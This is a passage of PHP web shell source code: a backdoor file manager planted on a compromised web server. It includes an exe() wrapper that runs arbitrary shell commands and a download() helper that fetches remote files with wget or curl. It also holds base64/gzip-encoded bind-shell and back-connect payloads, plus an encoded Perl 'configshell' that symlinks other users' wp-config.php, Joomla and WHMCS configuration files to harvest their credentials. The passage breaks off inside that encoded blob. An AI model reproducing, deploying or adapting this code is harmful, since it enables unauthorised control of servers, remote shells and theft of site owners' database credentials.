src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==\' />     [ $folder ]</b></a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" />\r\n\t\t\t</form><td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td>\r\n\t\t\t<td><center>\r\n\t\t\t<a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\">".get_perms($pwd.$folder)."</a>\r\n\t\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form3\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n\t\t\t<input type=\\"hidden\\" name=\\"name\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> \r\n\t\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($pwd.$folder)), -4)."\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod_folder\\" value=\\"chmod\\" /> \r\n\t\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" \r\n\t\t\tonclick=\\"tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form3\');\\" /></form></center></td>\r\n\t\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;fdelete=".$pwd.$folder."\\">delete</a></td></tr>";\r\n\t\t}\r\n\t}\r\n\r\n\tforeach($fname as $file){\r\n\t\t$full = $pwd.$file;\r\n\t\tif(!$win && $posix){\r\n\t\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t\t}\r\n\t\telse {\r\n\t\t\t$owner = $user;\r\n\t\t}\t\t\r\n\t\t$buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&amp;view=$full\\"><b><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\' />   $file</b></a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" />\r\n\t\t</form></td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td><center>\r\n\t\t<a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\">".get_perms($full)."</a>\r\n\t\t<form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form2\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> \r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> \r\n<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newvalue\\" value=\\"".substr(sprintf(\'%o\', fileperms($full)), -4)."\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"chmod\\" value=\\"chmod\\" /> \r\n<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form2\');\\" /></form></center></td>\r\n\t\t<td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td>\r\n\t\t<td><a href=\\"?y=$pwd&amp;edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$full\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$full\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$full\\">gzip</a>)</td></tr>";\r\n\t}\r\n\t$buff .= "</table>";\r\n\treturn $buff;\r\n}\r\n\r\nfunction ukuran($file){\r\n\tif($size = @filesize($file)){\r\n\t\tif($size <= 1024) return $size;\r\n\t\telse{\r\n\t\t\tif($size <= 1024*1024) {\r\n\t\t\t\t$size = @round($size / 1024,2);;\r\n\t\t\t\treturn "$size kb";\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\t$size = @round($size / 1024 / 1024,2);\r\n\t\t\t\treturn "$size mb";\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\telse return "???";\r\n}\r\n\r\nfunction exe($cmd){\r\n\tif(function_exists(\'system\')) {\r\n\t\t@ob_start();\r\n\t\t@system($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'exec\')) {\r\n\t\t@exec($cmd,$results);\r\n\t\t$buff = "";\r\n\t\tforeach($results as $result){\r\n\t\t\t$buff .= $result;\r\n\t\t}\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'passthru\')) {\r\n\t\t@ob_start();\r\n\t\t@passthru($cmd);\r\n\t\t$buff = @ob_get_contents();\r\n\t\t@ob_end_clean();\r\n\t\treturn $buff;\r\n\t}\r\n\telseif(function_exists(\'shell_exec\')){\r\n\t\t$buff = @shell_exec($cmd);\r\n\t\treturn $buff;\r\n\t}\r\n}\r\n\r\nfunction tulis($file,$text){\r\n\t$textz = gzinflate(base64_decode($text));\r\n\t if($filez = @fopen($file,"w"))\r\n\t {\r\n\t\t @fputs($filez,$textz);\r\n\t\t @fclose($file);\r\n\t }\r\n}\r\n\r\nfunction ambil($link,$file) { \r\n   if($fp = @fopen($link,"r")){\r\n\t   while(!feof($fp)) { \r\n   \t\t    $cont.= @fread($fp,1024); \r\n   \t\t} \r\n   \t\t@fclose($fp); \r\n\t   $fp2 = @fopen($file,"w"); \r\n\t   @fwrite($fp2,$cont); \r\n\t   @fclose($fp2); \r\n   }\r\n}\r\n\r\nfunction which($pr){\r\n\t$path = exe("which $pr");\r\n\tif(!empty($path)) { return trim($path); } else { return trim($pr); }\r\n}\r\n\r\nfunction download($cmd,$url){\r\n\t$namafile = basename($url);\r\n\tswitch($cmd) {\r\n\t\tcase \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break;\r\n\t\tcase \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wfread\' : ambil($wurl,$namafile);break;\r\n\t\tcase \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break;\r\n\t\tcase \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break;\r\n\t\tcase \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break;\r\n\t\tcase \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break;\r\n\t\tdefault: break;\r\n\t}\r\n\treturn $namafile;\r\n}\r\n\r\nfunction get_perms($file)\r\n{\r\n\tif($mode=@fileperms($file)){\r\n\t\t$perms=\'\';\r\n\t\t$perms .= ($mode & 00400) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00200) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00100) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00040) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00020) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00010) ? \'x\' : \'-\';\r\n\t\t$perms .= ($mode & 00004) ? \'r\' : \'-\';\r\n\t\t$perms .= ($mode & 00002) ? \'w\' : \'-\';\r\n\t\t$perms .= ($mode & 00001) ? \'x\' : \'-\';\r\n\t\treturn $perms;\r\n\t}\r\n\telse return "??????????";\r\n}\r\n\r\nfunction clearspace($text){\r\n\treturn str_replace(" ","_",$text);\r\n}\r\n\r\n// net tools\r\n$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf\r\n+fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE\r\nP/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ\r\ndKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL\r\n3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug\r\nUq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk\r\nHDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W\r\ntyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL\r\nZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6\r\nuPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";\r\n$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1\r\nNmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg\r\ntNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD\r\ne/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0\r\nLSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo\r\nvaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB\r\n+hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";\r\n$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St\r\nktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j\r\nS2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ\r\nja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw\r\nTskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";\r\n$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA\r\nBYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95\r\nzzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75\r\ni+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A\r\nRkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY\r\njwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F\r\n6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";\r\n//confshell\r\n$configshell = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHA